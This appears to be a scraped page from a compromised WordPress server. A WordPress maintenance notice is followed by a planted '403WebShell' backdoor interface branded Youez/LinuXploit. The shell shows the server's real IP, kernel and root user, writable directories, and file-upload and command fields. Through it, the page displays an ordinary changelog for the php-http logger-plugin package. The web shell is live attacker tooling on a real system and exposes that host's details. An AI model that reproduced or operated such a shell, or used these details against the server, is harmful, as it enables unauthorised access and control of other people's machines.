WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.240
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/vendor/php-http/logger-plugin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/vendor/php-http/logger-plugin/CHANGELOG.md
# Change Log

## 1.3.0 - 2022-02-11

- Do not log request when loggin response again, but use UID to identify request
  that belongs to response.
  If you use a logger that does not log `info` severity and want the request
  logged when an error happened, use a Fingerscrossed log handler to also log
  info if any error is logged.
- Removed the request and response from the log context. They did not get
  printed because they don't implement `__toString`.
- Supporting the newly introduced message formatter method
  `formatResponseForRequest` that allows more flexibility in the formatter.
  See https://github.com/php-http/message/pull/146

## 1.2.2 - 2021-07-26

- Allow installation with psr/log version 2 and 3

## 1.2.1 - 2020-11-27

- Allow installation with PHP 8.0

## 1.2.0 - 2020-07-14

- Use `hrtime` to avoid clock movement bugs
- Support only PHP 7.1-8.0

## 1.1.0 - 2019-01-19

- Support client-common 1.9 and 2
- Measure the time it took to do the request

## 1.0.0 - 2016-05-05

- Initial release

Youez - 2016 - github.com/yon3zu
LinuXploit